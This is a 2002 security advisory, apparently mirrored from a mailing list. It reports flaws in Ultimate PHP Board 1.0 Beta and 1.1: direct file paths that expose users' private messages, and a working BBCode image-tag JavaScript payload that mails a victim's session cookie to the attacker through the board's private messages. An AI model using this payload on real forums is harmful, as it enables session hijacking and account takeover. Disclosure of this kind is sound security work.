Computer Security

Security Advisory: Security holes : Ultimate PHP Board
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  CGI bugs

  CGIscript.net - csMailto.cgi - Remote Command Execution

  Philip Chinery's Guestbook 1.1 fails to filter out js/html

  Vulnerability in PostCalendar

From:frog frog <leseulfrog_(at)_hotmail.com>
Date:23.04.2002
Subject:Security holes : Ultimate PHP Board



Product :

Ultimate PHP Board

http://xcrew.host.sk



Versions :

1.0 Beta

1.1



Problems :

1.0 B :

- Reading of privates messages

1.1 & 1.0 B :

- Access to users/admins accounts



Exploits :

1.0 B :

- /members/ID.pm

- /members/ID.xbb

1.1 :

- [img]javascript:window.open('

index.php?

upb=pm&mode=send&send=yes&target_id=MY-

ID&betreff=cookie&pm='+document.cookie+

'&smilies=1&use_upbcode=1&pmbox_id=VICTIME-

ID&check=yes

')[/img]







More details in french :

http://www.ifrance.com/kitetoua/tuto/UPB.txt



translated by google :

http://translate.google.com/translate?u=http%3A%

2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%

2FUPB.txt&langpair=fr%7Cen&hl=en&prev=%

2Flanguage_tools



frog-m@n


About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru